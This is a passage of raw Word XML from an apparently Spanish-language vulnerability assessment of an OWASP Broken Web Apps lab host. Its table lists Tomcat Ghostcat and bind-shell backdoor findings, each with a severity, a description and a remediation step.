                <wp:wrapNone/>
                <wp:docPr id="13" name="Rectángulo 13"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="533400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3FA03" w14:textId="6C84154F" w:rsidR="00D85A35" w:rsidRPr="00DB3A8F" w:rsidRDefault="005F2B55" w:rsidP="00D85A35">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>owaspbw</w:t>
                            </w:r>
                            <w:r w:rsidR="000F0E63">
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>a</w:t>
                            </w:r>
                            <w:r w:rsidR="00D85A35" w:rsidRPr="00DB3A8F">
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> – 192.168.2.10</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-H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1145F" id="Rectángulo 13" o:spid="_x0000_s1033" style="position:absolute;margin-left:7.95pt;margin-top:9.55pt;width:420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" fillcolor="black [3213]" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5ED3FA03" w14:textId="6C84154F" w:rsidR="00D85A35" w:rsidRPr="00DB3A8F" w:rsidRDefault="005F2B55" w:rsidP="00D85A35">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>owaspbw</w:t>
                      </w:r>
                      <w:r w:rsidR="000F0E63">
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>a</w:t>
                      </w:r>
                      <w:r w:rsidR="00D85A35" w:rsidRPr="00DB3A8F">
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> – 192.168.2.10</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52EE4D73" wp14:editId="4443FA6E">
            <wp:extent cx="5612130" cy="12522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52220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C20E192" w14:textId="75776D9D" w:rsidR="005F2B55" w:rsidRPr="00BE3201" w:rsidRDefault="005F2B55" w:rsidP="005F2B55">
      <w:pPr>
        <w:pStyle w:val="Tablas"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3201">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Descripción de vulnerabilidades </w:t>
      </w:r>
      <w:r w:rsidR="007E5322">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>identificadas</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13069" w:type="dxa"/>
        <w:tblInd w:w="75" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="4678"/>
        <w:gridCol w:w="3718"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="00F26227" w14:paraId="07524A48" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="510"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413"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547A7FD2" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>HOST AFECTADO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A8676B3" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>VULNERABILIDAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1384A1F3" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>NIVEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62459090" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">DESCRIPCION </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C7C160" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">SOLUCION </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="346F2B81" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="228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7AF86DCA" w14:textId="1B09AD91" w:rsidR="005F2B55" w:rsidRPr="00F26227"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Pr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2798E315" w14:textId="1601490A" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F2B55">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Apache Tomcat AJP Connector Request Injection (Ghostcat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58362515" w14:textId="77777777" w:rsidR="005F2B55"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Critico</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4C6A7B" w14:textId="0F5FE0EA" w:rsidR="00EF1C4C" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C" w:rsidP="00250C4A">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219DBFF6" w14:textId="6AD44598" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C" w:rsidP="00EF1C4C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Se encontró una vulnerabilidad de lectura/inclusión de archivos en el conector AJP. Un atacante remoto no autenticado podría</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>aprovech</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>ar</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> esta vulnerabilidad para leer archivos de aplicaciones web desde un servidor vulnerable. En los casos en que el</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>servidor vulnerable permite la carga de archivos, un atacante podría cargar código malicioso JavaServer Pages (JSP) dentro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>una variedad de tipos de archivos y obtenga ejecución remota de código (RCE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BD9FA96" w14:textId="2AD1F88C" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C" w:rsidP="00EF1C4C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Actualice la configuración de AJP para solicitar autorización y/o actualice el servidor Tomcat a 7.0.100, 8.5.51,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>9.0.31 o posterior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="6C93A134" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="135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27E4B3A1" w14:textId="4F2B6E31" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C"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Pr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BCBF112" w14:textId="5093DD33" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Bind Shell Backdoor Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8C26F2" w14:textId="77777777" w:rsidR="00EF1C4C" w:rsidRDefault="00EF1C4C" w:rsidP="00EF1C4C">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Critico</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29EC0141" w14:textId="6FE49473" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00EF1C4C">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5DF8D98D" w14:textId="12AEF73B" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C" w:rsidP="00EF1C4C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r w:rsidR="004A3343" w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> está escuchando en el puerto remoto sin que se requiera ninguna autenticación. Un atacante puede usarlo por</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>conectándose al puerto remoto y enviando comandos directamente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EBEE63E" w14:textId="3CAF591C" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00EF1C4C" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Verifique si el host remoto se ha visto comprometido y reinstale el sistema si es necesario.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="7DD94786" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="3405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27EA9992" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E308C30" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B055A42" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
